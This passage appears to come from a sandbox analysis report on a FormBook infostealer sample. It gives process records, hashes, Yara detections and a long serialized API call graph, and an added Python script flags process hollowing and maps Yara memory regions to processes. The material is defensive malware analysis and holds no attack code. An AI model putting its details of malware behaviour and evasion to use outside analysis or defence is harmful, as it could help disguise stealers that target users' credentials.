                                  MD5 hash:EC2B2944AB4480E520A8015A0740E684
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4525395645.0000000004FC0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4525395645.0000000004FC0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4518364986.00000000032B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4518364986.00000000032B0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4525512009.0000000005000000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4525512009.0000000005000000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                  Reputation:moderate
                                  Has exited:false

                                  Target ID:6
                                  Start time:09:18:43
                                  Start date:23/05/2024
                                  Path:C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe"
                                  Imagebase:0xb00000
                                  File size:140'800 bytes
                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4527764176.0000000005230000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4527764176.0000000005230000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                  Reputation:high
                                  Has exited:false

                                  Target ID:8
                                  Start time:09:18:55
                                  Start date:23/05/2024
                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                  Imagebase:0x7ff728280000
                                  File size:676'768 bytes
                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true
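Two details in the process list above are the ones a responder should pull out first: Target ID 2 runs the svchost.exe image but carries the sample's own command line (the signature of an image replaced after process creation), and the FormBook Yara hits are reported per memory region with the dump name encoding the target id and region base. The script below is an added example, not the report's or Joe Sandbox's own code. It transcribes a subset of the records above as constructed data, flags the path/command-line mismatch, and groups the Yara hits by process. The layout of the .sdmp name is an assumption read off the names in this report: the first field matches the Target ID and the fourth looks like a base address; the remaining fields are kept opaque.

```python
import re
from collections import defaultdict

# Process records transcribed from the process list above (constructed
# subset: target id, image path, command line and Yara dump names only).
PROCESSES = [
    {"id": 0, "path": r"C:\Users\user\Desktop\PI No 20000814C.exe",
     "cmdline": r'"C:\Users\user\Desktop\PI No 20000814C.exe"', "yara": []},
    {"id": 2, "path": r"C:\Windows\SysWOW64\svchost.exe",
     "cmdline": r'"C:\Users\user\Desktop\PI No 20000814C.exe"',
     "yara": ["00000002.00000002.2228247758.0000000000470000.00000040.80000000.00040000.00000000.sdmp",
              "00000002.00000002.2228534862.0000000002CE0000.00000040.10000000.00040000.00000000.sdmp",
              "00000002.00000002.2229293264.0000000004000000.00000040.10000000.00040000.00000000.sdmp"]},
    {"id": 4, "path": r"C:\Windows\SysWOW64\cipher.exe",
     "cmdline": r'"C:\Windows\SysWOW64\cipher.exe"',
     "yara": ["00000004.00000002.4525395645.0000000004FC0000.00000004.00000800.00020000.00000000.sdmp",
              "00000004.00000002.4518364986.00000000032B0000.00000040.80000000.00040000.00000000.sdmp"]},
    {"id": 8, "path": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "cmdline": r'"C:\Program Files\Mozilla Firefox\Firefox.exe"', "yara": []},
]


def image_from_cmdline(cmdline: str) -> str:
    """Return the executable a command line names: the quoted first argument,
    or the first whitespace-delimited token when unquoted."""
    m = re.match(r'\s*"([^"]+)"', cmdline)
    return m.group(1) if m else cmdline.split()[0]


def hollowing_suspects(processes) -> list:
    """Flag processes whose loaded image differs from the image the command
    line names. A normal CreateProcess leaves these identical apart from
    letter case (compare Firefox.exe vs firefox.exe above); a real mismatch
    means the image was swapped after the process was created."""
    return [p["id"] for p in processes
            if image_from_cmdline(p["cmdline"]).lower() != p["path"].lower()]


_SDMP = re.compile(r"^([0-9a-f]{8})\.[0-9a-f]{8}\.\d+\.([0-9a-f]{16})\.([0-9a-f]{8})\.")


def parse_sdmp(name: str) -> tuple:
    """Split a memory-dump name into (target id, base address, flags). The
    field layout is an assumption read off the names in this report: the
    first field matches the Target ID and the fourth looks like a base
    address. The fifth is returned as an opaque flags value."""
    m = _SDMP.match(name.lower())
    if not m:
        raise ValueError("unexpected dump name: " + name)
    return int(m.group(1), 16), int(m.group(2), 16), int(m.group(3), 16)


def yara_regions_by_process(processes) -> dict:
    """Map each target id to the base addresses of regions with Yara hits,
    so the hits can be read next to the hollowing result."""
    out = defaultdict(list)
    for p in processes:
        for name in p["yara"]:
            tid, base, _flags = parse_sdmp(name)
            out[tid].append(base)
    return dict(out)


if __name__ == "__main__":
    print("hollowing suspects:", hollowing_suspects(PROCESSES))
    for tid, bases in sorted(yara_regions_by_process(PROCESSES).items()):
        print(tid, [hex(b) for b in bases])
```

On the records above only Target ID 2 is flagged, and the Yara regions land in processes 2 and 4, which is the chain to hand to memory forensics: dump those bases rather than the on-disk svchost.exe or cipher.exe, which are clean Microsoft binaries.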


                                    Execution Graph

                                    Execution Coverage:4%
                                    Dynamic/Decrypted Code Coverage:1.5%
                                    Signature Coverage:5.2%
                                    Total number of Nodes:2000
                                    Total number of Limit Nodes:182
                                    execution_graph: node and edge listing of the call graph omitted (serialized graph data, truncated in the source). Nodes cover the CRT startup path from the entry point f27e93 and the Win32 APIs reached from it, including GetStartupInfoW, GetProcessHeap, GetCommandLineW, GetEnvironmentStringsW, GetModuleFileNameW, TlsAlloc, IsDebuggerPresent, SetUnhandledExceptionFilter, TerminateProcess, RaiseException, MessageBoxA, SetCurrentDirectoryW, GetFullPathNameW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, SystemParametersInfoW, RegisterClassExW, CreateWindowExW, LoadLibraryA, LoadLibraryExW, GetProcAddress, GetSystemTimeAsFileTime, CreateFileW and GetFileType.
99181->99183 99184 f38379 GetLastError 99181->99184 99186 f382ba 99182->99186 99196 f2d76a __set_osfhnd 59 API calls 99183->99196 99187 f28d47 __dosmaperr 58 API calls 99184->99187 99185 f3833c GetLastError 99189 f28d47 __dosmaperr 58 API calls 99185->99189 99190 f28d68 __lseeki64_nolock 58 API calls 99186->99190 99191 f383a0 CloseHandle 99187->99191 99188->99181 99188->99185 99192 f37f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 99188->99192 99193 f38361 99189->99193 99190->99168 99191->99193 99194 f383ae 99191->99194 99195 f38331 99192->99195 99198 f28d68 __lseeki64_nolock 58 API calls 99193->99198 99197 f28d68 __lseeki64_nolock 58 API calls 99194->99197 99195->99181 99195->99185 99200 f383d9 99196->99200 99199 f383b3 99197->99199 99198->99223 99199->99193 99201 f31b11 __lseeki64_nolock 60 API calls 99200->99201 99202 f38594 99200->99202 99206 f3845a 99200->99206 99203 f38443 99201->99203 99204 f38767 CloseHandle 99202->99204 99202->99223 99203->99206 99208 f28d34 __commit 58 API calls 99203->99208 99205 f37f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 99204->99205 99207 f3878e 99205->99207 99206->99202 99209 f310ab 70 API calls __read_nolock 99206->99209 99214 f30d2d __close_nolock 61 API calls 99206->99214 99216 f399f2 __chsize_nolock 82 API calls 99206->99216 99217 f2dac6 __write 78 API calls 99206->99217 99218 f38611 99206->99218 99219 f31b11 60 API calls __lseeki64_nolock 99206->99219 99210 f38796 GetLastError 99207->99210 99211 f387c2 99207->99211 99208->99206 99209->99206 99212 f28d47 __dosmaperr 58 API calls 99210->99212 99211->99223 99213 f387a2 99212->99213 99215 f2d67d __free_osfhnd 59 API calls 99213->99215 99214->99206 99215->99211 99216->99206 99217->99206 99220 f30d2d __close_nolock 61 API calls 99218->99220 99219->99206 99221 f38618 99220->99221 99222 f28d68 __lseeki64_nolock 58 API calls 99221->99222 99222->99223 99223->99154 99224->99144 99225->99150 99226->99150 99228 f04ce1 99227->99228 99229 f04d9d LoadLibraryA 
99227->99229 99228->99030 99228->99031 99229->99228 99230 f04dae GetProcAddress 99229->99230 99230->99228 99232 f20ff6 Mailbox 59 API calls 99231->99232 99233 f053a0 99232->99233 99233->99038 99235 f04fff 99234->99235 99236 f05003 FindResourceExW 99235->99236 99240 f05020 99235->99240 99237 f3dd5c LoadResource 99236->99237 99236->99240 99238 f3dd71 SizeofResource 99237->99238 99237->99240 99239 f3dd85 LockResource 99238->99239 99238->99240 99239->99240 99240->99039 99242 f05054 99241->99242 99243 f3ddd4 99241->99243 99247 f25a7d 99242->99247 99245 f05062 99245->99049 99246->99039 99248 f25a89 __setmode 99247->99248 99249 f25a9b 99248->99249 99251 f25ac1 99248->99251 99260 f28d68 58 API calls __getptd_noexit 99249->99260 99262 f26e4e 99251->99262 99252 f25aa0 99261 f28ff6 9 API calls __Wcsftime_l 99252->99261 99255 f25ac7 99268 f259ee 83 API calls 5 library calls 99255->99268 99257 f25ad6 99269 f25af8 RtlLeaveCriticalSection RtlLeaveCriticalSection _fseek 99257->99269 99259 f25aab __setmode 99259->99245 99260->99252 99261->99259 99263 f26e80 RtlEnterCriticalSection 99262->99263 99264 f26e5e 99262->99264 99266 f26e76 99263->99266 99264->99263 99265 f26e66 99264->99265 99267 f29e4b __lock 58 API calls 99265->99267 99266->99255 99267->99266 99268->99257 99269->99259 99273 f2582d 99270->99273 99272 f0508e 99272->99058 99274 f25839 __setmode 99273->99274 99275 f2584f _memset 99274->99275 99276 f2587c 99274->99276 99277 f25874 __setmode 99274->99277 99300 f28d68 58 API calls __getptd_noexit 99275->99300 99278 f26e4e __lock_file 59 API calls 99276->99278 99277->99272 99279 f25882 99278->99279 99286 f2564d 99279->99286 99282 f25869 99301 f28ff6 9 API calls __Wcsftime_l 99282->99301 99290 f25668 _memset 99286->99290 99293 f25683 99286->99293 99287 f25673 99398 f28d68 58 API calls __getptd_noexit 99287->99398 99289 f25678 99399 f28ff6 9 API calls __Wcsftime_l 99289->99399 99290->99287 99290->99293 99297 f256c3 99290->99297 99302 f258b6 RtlLeaveCriticalSection 
RtlLeaveCriticalSection _fseek 99293->99302 99294 f257d4 _memset 99401 f28d68 58 API calls __getptd_noexit 99294->99401 99297->99293 99297->99294 99303 f24916 99297->99303 99310 f310ab 99297->99310 99378 f30df7 99297->99378 99400 f30f18 58 API calls 4 library calls 99297->99400 99300->99282 99301->99277 99302->99277 99304 f24920 99303->99304 99305 f24935 99303->99305 99402 f28d68 58 API calls __getptd_noexit 99304->99402 99305->99297 99307 f24925 99403 f28ff6 9 API calls __Wcsftime_l 99307->99403 99309 f24930 99309->99297 99311 f310e3 99310->99311 99312 f310cc 99310->99312 99313 f3181b 99311->99313 99317 f3111d 99311->99317 99413 f28d34 58 API calls __getptd_noexit 99312->99413 99429 f28d34 58 API calls __getptd_noexit 99313->99429 99316 f310d1 99414 f28d68 58 API calls __getptd_noexit 99316->99414 99320 f31125 99317->99320 99327 f3113c 99317->99327 99318 f31820 99430 f28d68 58 API calls __getptd_noexit 99318->99430 99415 f28d34 58 API calls __getptd_noexit 99320->99415 99323 f31131 99431 f28ff6 9 API calls __Wcsftime_l 99323->99431 99324 f3112a 99416 f28d68 58 API calls __getptd_noexit 99324->99416 99326 f31151 99417 f28d34 58 API calls __getptd_noexit 99326->99417 99327->99326 99328 f3116b 99327->99328 99331 f31189 99327->99331 99358 f310d8 99327->99358 99328->99326 99333 f31176 99328->99333 99418 f28a5d 58 API calls 2 library calls 99331->99418 99404 f35ebb 99333->99404 99334 f31199 99336 f311a1 99334->99336 99337 f311bc 99334->99337 99419 f28d68 58 API calls __getptd_noexit 99336->99419 99421 f31b11 60 API calls 2 library calls 99337->99421 99338 f3128a 99341 f31303 ReadFile 99338->99341 99342 f312a0 GetConsoleMode 99338->99342 99344 f317e3 GetLastError 99341->99344 99345 f31325 99341->99345 99346 f31300 99342->99346 99347 f312b4 99342->99347 99343 f311a6 99420 f28d34 58 API calls __getptd_noexit 99343->99420 99349 f317f0 99344->99349 99350 f312e3 99344->99350 99345->99344 99353 f312f5 99345->99353 99346->99341 99347->99346 99351 f312ba ReadConsoleW 
99347->99351 99427 f28d68 58 API calls __getptd_noexit 99349->99427 99362 f312e9 99350->99362 99422 f28d47 58 API calls 3 library calls 99350->99422 99351->99353 99354 f312dd GetLastError 99351->99354 99360 f3135a 99353->99360 99361 f315c7 99353->99361 99353->99362 99354->99350 99356 f317f5 99428 f28d34 58 API calls __getptd_noexit 99356->99428 99358->99297 99359 f22f95 _free 58 API calls 99359->99358 99364 f313c6 ReadFile 99360->99364 99371 f31447 99360->99371 99361->99362 99365 f316cd ReadFile 99361->99365 99362->99358 99362->99359 99366 f313e7 GetLastError 99364->99366 99377 f313f1 99364->99377 99370 f316f0 GetLastError 99365->99370 99376 f316fe 99365->99376 99366->99377 99367 f314f4 99424 f28d68 58 API calls __getptd_noexit 99367->99424 99369 f31504 99372 f314b4 MultiByteToWideChar 99369->99372 99425 f31b11 60 API calls 2 library calls 99369->99425 99370->99376 99371->99362 99371->99367 99371->99369 99371->99372 99372->99354 99372->99362 99376->99361 99426 f31b11 60 API calls 2 library calls 99376->99426 99377->99360 99423 f31b11 60 API calls 2 library calls 99377->99423 99379 f30e02 99378->99379 99380 f30e17 99378->99380 99465 f28d68 58 API calls __getptd_noexit 99379->99465 99384 f30e4c 99380->99384 99389 f30e12 99380->99389 99467 f36234 58 API calls __malloc_crt 99380->99467 99382 f30e07 99466 f28ff6 9 API calls __Wcsftime_l 99382->99466 99386 f24916 __fclose_nolock 58 API calls 99384->99386 99387 f30e60 99386->99387 99432 f30f97 99387->99432 99389->99297 99390 f30e67 99390->99389 99391 f24916 __fclose_nolock 58 API calls 99390->99391 99392 f30e8a 99391->99392 99392->99389 99393 f24916 __fclose_nolock 58 API calls 99392->99393 99394 f30e96 99393->99394 99394->99389 99395 f24916 __fclose_nolock 58 API calls 99394->99395 99396 f30ea3 99395->99396 99397 f24916 __fclose_nolock 58 API calls 99396->99397 99397->99389 99398->99289 99399->99293 99400->99297 99401->99289 99402->99307 99403->99309 99405 f35ed3 99404->99405 99406 f35ec6 99404->99406 99408 f35edf 
99405->99408 99409 f28d68 __lseeki64_nolock 58 API calls 99405->99409 99407 f28d68 __lseeki64_nolock 58 API calls 99406->99407 99410 f35ecb 99407->99410 99408->99338 99411 f35f00 99409->99411 99410->99338 99412 f28ff6 __Wcsftime_l 9 API calls 99411->99412 99412->99410 99413->99316 99414->99358 99415->99324 99416->99323 99417->99324 99418->99334 99419->99343 99420->99358 99421->99333 99422->99362 99423->99377 99424->99362 99425->99372 99426->99376 99427->99356 99428->99362 99429->99318 99430->99323 99431->99358 99433 f30fa3 __setmode 99432->99433 99434 f30fb0 99433->99434 99435 f30fc7 99433->99435 99436 f28d34 __commit 58 API calls 99434->99436 99437 f3108b 99435->99437 99440 f30fdb 99435->99440 99439 f30fb5 99436->99439 99438 f28d34 __commit 58 API calls 99437->99438 99441 f30ffe 99438->99441 99442 f28d68 __lseeki64_nolock 58 API calls 99439->99442 99443 f31006 99440->99443 99444 f30ff9 99440->99444 99449 f28d68 __lseeki64_nolock 58 API calls 99441->99449 99456 f30fbc __setmode 99442->99456 99446 f31013 99443->99446 99447 f31028 99443->99447 99445 f28d34 __commit 58 API calls 99444->99445 99445->99441 99450 f28d34 __commit 58 API calls 99446->99450 99448 f2d446 ___lock_fhandle 59 API calls 99447->99448 99451 f3102e 99448->99451 99452 f31020 99449->99452 99453 f31018 99450->99453 99454 f31041 99451->99454 99455 f31054 99451->99455 99459 f28ff6 __Wcsftime_l 9 API calls 99452->99459 99457 f28d68 __lseeki64_nolock 58 API calls 99453->99457 99458 f310ab __read_nolock 70 API calls 99454->99458 99460 f28d68 __lseeki64_nolock 58 API calls 99455->99460 99456->99390 99457->99452 99461 f3104d 99458->99461 99459->99456 99462 f31059 99460->99462 99464 f31083 __read RtlLeaveCriticalSection 99461->99464 99463 f28d34 __commit 58 API calls 99462->99463 99463->99461 99464->99456 99465->99382 99466->99389 99467->99384 99471 f2543a GetSystemTimeAsFileTime 99468->99471 99470 f691f8 99470->99060 99472 f25468 __aulldiv 99471->99472 99472->99470 99474 f25e9c __setmode 99473->99474 99475 
f25ec3 99474->99475 99476 f25eae 99474->99476 99478 f26e4e __lock_file 59 API calls 99475->99478 99487 f28d68 58 API calls __getptd_noexit 99476->99487 99480 f25ec9 99478->99480 99479 f25eb3 99488 f28ff6 9 API calls __Wcsftime_l 99479->99488 99489 f25b00 67 API calls 7 library calls 99480->99489 99483 f25ed4 99490 f25ef4 RtlLeaveCriticalSection RtlLeaveCriticalSection _fseek 99483->99490 99485 f25ee6 99486 f25ebe __setmode 99485->99486 99486->99065 99487->99479 99488->99486 99489->99483 99490->99485 99491->98918 99492->98926 99493->98939 99494->98941 99495->98938 99496->98947 99498 f092c9 Mailbox 99497->99498 99499 f3f5c8 99498->99499 99504 f092d3 99498->99504 99500 f20ff6 Mailbox 59 API calls 99499->99500 99502 f3f5d4 99500->99502 99501 f092da 99501->98951 99504->99501 99505 f09df0 59 API calls Mailbox 99504->99505 99505->99504 99506->98962 99507->98961 99509 f699d2 __tzset_nolock _wcscmp 99508->99509 99510 f69866 99509->99510 99511 f0506b 74 API calls 99509->99511 99512 f69393 GetSystemTimeAsFileTime 99509->99512 99513 f05045 85 API calls 99509->99513 99510->98968 99510->98997 99511->99509 99512->99509 99513->99509 99515 f68da9 99514->99515 99516 f68d9b 99514->99516 99518 f68dee 99515->99518 99519 f2548b 115 API calls 99515->99519 99540 f68db2 99515->99540 99517 f2548b 115 API calls 99516->99517 99517->99515 99545 f6901b 99518->99545 99521 f68dd3 99519->99521 99521->99518 99523 f68ddc 99521->99523 99522 f68e32 99524 f68e36 99522->99524 99525 f68e57 99522->99525 99528 f255d6 __fcloseall 83 API calls 99523->99528 99523->99540 99527 f68e43 99524->99527 99530 f255d6 __fcloseall 83 API calls 99524->99530 99549 f68c33 99525->99549 99533 f255d6 __fcloseall 83 API calls 99527->99533 99527->99540 99528->99540 99530->99527 99531 f68e85 99558 f68eb5 99531->99558 99532 f68e65 99534 f68e72 99532->99534 99536 f255d6 __fcloseall 83 API calls 99532->99536 99533->99540 99538 f255d6 __fcloseall 83 API calls 99534->99538 99534->99540 99536->99534 99538->99540 99540->98996 99542 
f68ea0 99542->99540 99544 f255d6 __fcloseall 83 API calls 99542->99544 99544->99540 99546 f69040 99545->99546 99547 f69029 __tzset_nolock _memmove 99545->99547 99548 f25812 __fread_nolock 74 API calls 99546->99548 99547->99522 99548->99547 99550 f2594c __crtCompareStringA_stat 58 API calls 99549->99550 99551 f68c42 99550->99551 99552 f2594c __crtCompareStringA_stat 58 API calls 99551->99552 99553 f68c56 99552->99553 99554 f2594c __crtCompareStringA_stat 58 API calls 99553->99554 99555 f68c6a 99554->99555 99556 f68f97 58 API calls 99555->99556 99557 f68c7d 99555->99557 99556->99557 99557->99531 99557->99532 99562 f68eca 99558->99562 99559 f68f82 99587 f691bf 99559->99587 99561 f68c8f 74 API calls 99561->99562 99562->99559 99562->99561 99565 f68e8c 99562->99565 99591 f68d2b 74 API calls 99562->99591 99592 f6909c 80 API calls 99562->99592 99566 f68f97 99565->99566 99567 f68fa4 99566->99567 99568 f68faa 99566->99568 99569 f22f95 _free 58 API calls 99567->99569 99570 f68fbb 99568->99570 99571 f22f95 _free 58 API calls 99568->99571 99569->99568 99572 f68e93 99570->99572 99573 f22f95 _free 58 API calls 99570->99573 99571->99570 99572->99542 99574 f255d6 99572->99574 99573->99572 99575 f255e2 __setmode 99574->99575 99576 f255f6 99575->99576 99577 f2560e 99575->99577 99674 f28d68 58 API calls __getptd_noexit 99576->99674 99579 f26e4e __lock_file 59 API calls 99577->99579 99586 f25606 __setmode 99577->99586 99581 f25620 99579->99581 99580 f255fb 99675 f28ff6 9 API calls __Wcsftime_l 99580->99675 99658 f2556a 99581->99658 99586->99542 99588 f691cc 99587->99588 99590 f691dd 99587->99590 99593 f24a93 99588->99593 99590->99565 99591->99562 99592->99562 99594 f24a9f __setmode 99593->99594 99595 f24acd __setmode 99594->99595 99596 f24ad5 99594->99596 99597 f24abd 99594->99597 99595->99590 99598 f26e4e __lock_file 59 API calls 99596->99598 99618 f28d68 58 API calls __getptd_noexit 99597->99618 99600 f24adb 99598->99600 99606 f2493a 99600->99606 99601 f24ac2 99619 f28ff6 9 API calls 
__Wcsftime_l 99601->99619 99609 f24949 99606->99609 99612 f24967 99606->99612 99607 f24957 99649 f28d68 58 API calls __getptd_noexit 99607->99649 99609->99607 99609->99612 99616 f24981 _memmove 99609->99616 99610 f2495c 99650 f28ff6 9 API calls __Wcsftime_l 99610->99650 99620 f24b0d RtlLeaveCriticalSection RtlLeaveCriticalSection _fseek 99612->99620 99615 f24916 __fclose_nolock 58 API calls 99615->99616 99616->99612 99616->99615 99621 f2dac6 99616->99621 99651 f24c6d 99616->99651 99657 f2b05e 78 API calls 7 library calls 99616->99657 99618->99601 99619->99595 99620->99595 99622 f2dad2 __setmode 99621->99622 99623 f2daf6 99622->99623 99624 f2dadf 99622->99624 99625 f2db95 99623->99625 99627 f2db0a 99623->99627 99626 f28d34 __commit 58 API calls 99624->99626 99628 f28d34 __commit 58 API calls 99625->99628 99629 f2dae4 99626->99629 99630 f2db32 99627->99630 99631 f2db28 99627->99631 99632 f2db2d 99628->99632 99633 f28d68 __lseeki64_nolock 58 API calls 99629->99633 99635 f2d446 ___lock_fhandle 59 API calls 99630->99635 99634 f28d34 __commit 58 API calls 99631->99634 99637 f28d68 __lseeki64_nolock 58 API calls 99632->99637 99644 f2daeb __setmode 99633->99644 99634->99632 99636 f2db38 99635->99636 99638 f2db4b 99636->99638 99639 f2db5e 99636->99639 99640 f2dba1 99637->99640 99641 f2dbb5 __write_nolock 76 API calls 99638->99641 99643 f28d68 __lseeki64_nolock 58 API calls 99639->99643 99642 f28ff6 __Wcsftime_l 9 API calls 99640->99642 99645 f2db57 99641->99645 99642->99644 99646 f2db63 99643->99646 99644->99616 99648 f2db8d __write RtlLeaveCriticalSection 99645->99648 99647 f28d34 __commit 58 API calls 99646->99647 99647->99645 99648->99644 99649->99610 99650->99612 99652 f24c80 99651->99652 99656 f24ca4 99651->99656 99653 f24916 __fclose_nolock 58 API calls 99652->99653 99652->99656 99654 f24c9d 99653->99654 99655 f2dac6 __write 78 API calls 99654->99655 99655->99656 99656->99616 99657->99616 99659 f25579 99658->99659 99660 f2558d 99658->99660 99707 f28d68 58 API calls 
__getptd_noexit 99659->99707 99662 f25589 99660->99662 99663 f24c6d __flush 78 API calls 99660->99663 99676 f25645 RtlLeaveCriticalSection RtlLeaveCriticalSection _fseek 99662->99676 99665 f25599 99663->99665 99664 f2557e 99708 f28ff6 9 API calls __Wcsftime_l 99664->99708 99677 f30dc7 99665->99677 99669 f24916 __fclose_nolock 58 API calls 99670 f255a7 99669->99670 99681 f30c52 99670->99681 99672 f255ad 99672->99662 99673 f22f95 _free 58 API calls 99672->99673 99673->99662 99674->99580 99675->99586 99676->99586 99678 f255a1 99677->99678 99679 f30dd4 99677->99679 99678->99669 99679->99678 99680 f22f95 _free 58 API calls 99679->99680 99680->99678 99682 f30c5e __setmode 99681->99682 99683 f30c82 99682->99683 99684 f30c6b 99682->99684 99686 f30d0d 99683->99686 99688 f30c92 99683->99688 99733 f28d34 58 API calls __getptd_noexit 99684->99733 99738 f28d34 58 API calls __getptd_noexit 99686->99738 99687 f30c70 99734 f28d68 58 API calls __getptd_noexit 99687->99734 99691 f30cb0 99688->99691 99692 f30cba 99688->99692 99735 f28d34 58 API calls __getptd_noexit 99691->99735 99709 f2d446 99692->99709 99693 f30cb5 99739 f28d68 58 API calls __getptd_noexit 99693->99739 99696 f30cc0 99699 f30cd3 99696->99699 99700 f30cde 99696->99700 99698 f30d19 99740 f28ff6 9 API calls __Wcsftime_l 99698->99740 99718 f30d2d 99699->99718 99736 f28d68 58 API calls __getptd_noexit 99700->99736 99703 f30c77 __setmode 99703->99672 99705 f30cd9 99737 f30d05 RtlLeaveCriticalSection __unlock_fhandle 99705->99737 99707->99664 99708->99662 99710 f2d452 __setmode 99709->99710 99711 f2d4a1 RtlEnterCriticalSection 99710->99711 99712 f29e4b __lock 58 API calls 99710->99712 99713 f2d4c7 __setmode 99711->99713 99714 f2d477 99712->99714 99713->99696 99715 f2d48f 99714->99715 99741 f2a06b InitializeCriticalSectionAndSpinCount 99714->99741 99742 f2d4cb RtlLeaveCriticalSection _doexit 99715->99742 99743 f2d703 99718->99743 99720 f30d91 99756 f2d67d 59 API calls 2 library calls 99720->99756 99722 f30d3b 99722->99720 
99723 f30d6f 99722->99723 99726 f2d703 __lseeki64_nolock 58 API calls 99722->99726 99723->99720 99724 f2d703 __lseeki64_nolock 58 API calls 99723->99724 99728 f30d7b FindCloseChangeNotification 99724->99728 99725 f30d99 99729 f30dbb 99725->99729 99757 f28d47 58 API calls 3 library calls 99725->99757 99727 f30d66 99726->99727 99730 f2d703 __lseeki64_nolock 58 API calls 99727->99730 99728->99720 99731 f30d87 GetLastError 99728->99731 99729->99705 99730->99723 99731->99720 99733->99687 99734->99703 99735->99693 99736->99705 99737->99703 99738->99693 99739->99698 99740->99703 99741->99715 99742->99711 99744 f2d723 99743->99744 99745 f2d70e 99743->99745 99748 f28d34 __commit 58 API calls 99744->99748 99750 f2d748 99744->99750 99746 f28d34 __commit 58 API calls 99745->99746 99747 f2d713 99746->99747 99749 f28d68 __lseeki64_nolock 58 API calls 99747->99749 99751 f2d752 99748->99751 99752 f2d71b 99749->99752 99750->99722 99753 f28d68 __lseeki64_nolock 58 API calls 99751->99753 99752->99722 99754 f2d75a 99753->99754 99755 f28ff6 __Wcsftime_l 9 API calls 99754->99755 99755->99752 99756->99725 99757->99729 99820 f31b90 99758->99820 99761 f048f7 99826 f07eec 99761->99826 99762 f048da 99764 f07d2c 59 API calls 99762->99764 99765 f048e6 99764->99765 99822 f07886 99765->99822 99768 f209d5 99769 f31b90 __ftell_nolock 99768->99769 99770 f209e2 GetLongPathNameW 99769->99770 99771 f07d2c 59 API calls 99770->99771 99772 f0741d 99771->99772 99773 f0716b 99772->99773 99774 f077c7 59 API calls 99773->99774 99775 f0717d 99774->99775 99776 f048ae 60 API calls 99775->99776 99777 f07188 99776->99777 99778 f07193 99777->99778 99782 f3ecae 99777->99782 99779 f03f84 59 API calls 99778->99779 99781 f0719f 99779->99781 99834 f034c2 99781->99834 99784 f3ecc8 99782->99784 99840 f07a68 61 API calls 99782->99840 99785 f071b2 Mailbox 99785->98686 99787 f04f3d 135 API calls 99786->99787 99788 f069ef 99787->99788 99789 f3e45a 99788->99789 99790 f04f3d 135 API calls 99788->99790 99791 f697e5 122 API 
calls 99789->99791 99792 f06a03 99790->99792 99793 f3e46f 99791->99793 99792->99789 99794 f06a0b 99792->99794 99795 f3e473 99793->99795 99796 f3e490 99793->99796 99798 f06a17 99794->99798 99799 f3e47b 99794->99799 99800 f04faa 84 API calls 99795->99800 99797 f20ff6 Mailbox 59 API calls 99796->99797 99819 f3e4d5 Mailbox 99797->99819 99841 f06bec 99798->99841 99947 f64534 90 API calls _wprintf 99799->99947 99800->99799 99804 f3e489 99804->99796 99805 f3e689 99806 f22f95 _free 58 API calls 99805->99806 99807 f3e691 99806->99807 99808 f04faa 84 API calls 99807->99808 99813 f3e69a 99808->99813 99812 f22f95 _free 58 API calls 99812->99813 99813->99812 99814 f04faa 84 API calls 99813->99814 99951 f5fcb1 89 API calls 4 library calls 99813->99951 99814->99813 99816 f07f41 59 API calls 99816->99819 99819->99805 99819->99813 99819->99816 99933 f0766f 99819->99933 99941 f074bd 99819->99941 99948 f5fc4d 59 API calls 2 library calls 99819->99948 99949 f5fb6e 61 API calls 2 library calls 99819->99949 99950 f67621 59 API calls Mailbox 99819->99950 99821 f048bb GetFullPathNameW 99820->99821 99821->99761 99821->99762 99823 f07894 99822->99823 99830 f07e8c 99823->99830 99825 f048f2 99825->99768 99827 f07f06 99826->99827 99829 f07ef9 99826->99829 99828 f20ff6 Mailbox 59 API calls 99827->99828 99828->99829 99829->99765 99831 f07e9a 99830->99831 99833 f07ea3 _memmove 99830->99833 99832 f07faf 59 API calls 99831->99832 99831->99833 99832->99833 99833->99825 99836 f034d4 99834->99836 99839 f034f3 _memmove 99834->99839 99835 f20ff6 Mailbox 59 API calls 99837 f0350a 99835->99837 99838 f20ff6 Mailbox 59 API calls 99836->99838 99837->99785 99838->99839 99839->99835 99840->99782 99842 f3e847 99841->99842 99843 f06c15 99841->99843 100051 f5fcb1 89 API calls 4 library calls 99842->100051 99957 f05906 99843->99957 